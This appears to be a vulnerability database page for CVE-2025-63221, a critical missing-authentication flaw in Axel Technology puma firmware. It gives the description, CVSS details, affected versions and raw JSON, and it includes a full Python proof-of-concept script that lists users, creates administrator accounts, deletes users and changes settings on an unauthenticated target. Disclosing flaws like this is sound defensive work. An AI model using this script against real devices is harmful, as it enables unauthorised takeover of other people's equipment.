Security Vulnerability Report
中文
CVE-2025-63221 CVSS 9.1 CRITICAL

CVE-2025-63221

Published: 2025-11-19 16:15:48
Last Modified: 2026-01-12 16:16:59
Source: [email protected]

Description

The Axel Technology puma devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:axeltechnology:puma_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:axeltechnology:puma:-:*:*:*:*:*:*:* - NOT VULNERABLE
Axel Technology puma 固件 < 0.8.5
Axel Technology puma 固件 0.8.5 - 1.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-63221 PoC - Axel Technology puma Broken Access Control Axel Technology puma devices (firmware 0.8.5-1.0.3) - Missing authentication on /cgi-bin/gstFcgi.fcgi """ import requests import json import sys TARGET = "http://<target-ip>" # Replace with target IP ENDPOINT = f"{TARGET}/cgi-bin/gstFcgi.fcgi" def list_users(): """List all user accounts on the device""" payload = { "cmd": "list_users", "format": "json" } try: response = requests.post(ENDPOINT, data=payload, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") return response.json() except Exception as e: print(f"[-] Error listing users: {e}") return None def create_admin_user(username, password): """Create a new administrator user""" payload = { "cmd": "create_user", "username": username, "password": password, "role": "admin", "format": "json" } try: response = requests.post(ENDPOINT, data=payload, timeout=10) print(f"[*] Creating admin user: {username}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") return response.json() except Exception as e: print(f"[-] Error creating user: {e}") return None def delete_user(username): """Delete a user account""" payload = { "cmd": "delete_user", "username": username, "format": "json" } try: response = requests.post(ENDPOINT, data=payload, timeout=10) print(f"[*] Deleting user: {username}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") return response.json() except Exception as e: print(f"[-] Error deleting user: {e}") return None def modify_settings(settings): """Modify system settings""" payload = { "cmd": "set_settings", "settings": json.dumps(settings), "format": "json" } try: response = requests.post(ENDPOINT, data=payload, timeout=10) print(f"[*] Modifying system settings") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") return response.json() except Exception as e: print(f"[-] Error modifying settings: {e}") return None if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 cve-2025-63221.py <action> [args]") print("Actions: list_users, create_admin, delete_user, modify_settings") sys.exit(1) action = sys.argv[1] if action == "list_users": list_users() elif action == "create_admin" and len(sys.argv) == 4: create_admin_user(sys.argv[2], sys.argv[3]) elif action == "delete_user" and len(sys.argv) == 3: delete_user(sys.argv[2]) elif action == "modify_settings": settings = {"key": "value"} # Configure as needed modify_settings(settings) else: print("Invalid action or missing arguments") sys.exit(1)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63221", "sourceIdentifier": "[email protected]", "published": "2025-11-19T16:15:48.177", "lastModified": "2026-01-12T16:16:58.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Axel Technology puma devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:axeltechnology:puma_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.8.5", "versionEndIncluding": "1.0.3", "matchCriteriaId": "38879C79-5AE1-4A75-B7E0-C97EE3092560"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:axeltechnology:puma:-:*:*:*:*:*:*:*", "matchCriteriaId": "6EC7FCE6-C21B-4D13-B558-02070AB347AF"}]}]}], "references": [{"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63221_Axel%20Technology%20puma%20-%20Broken%20Access%20Control", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.axeltechnology.com/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.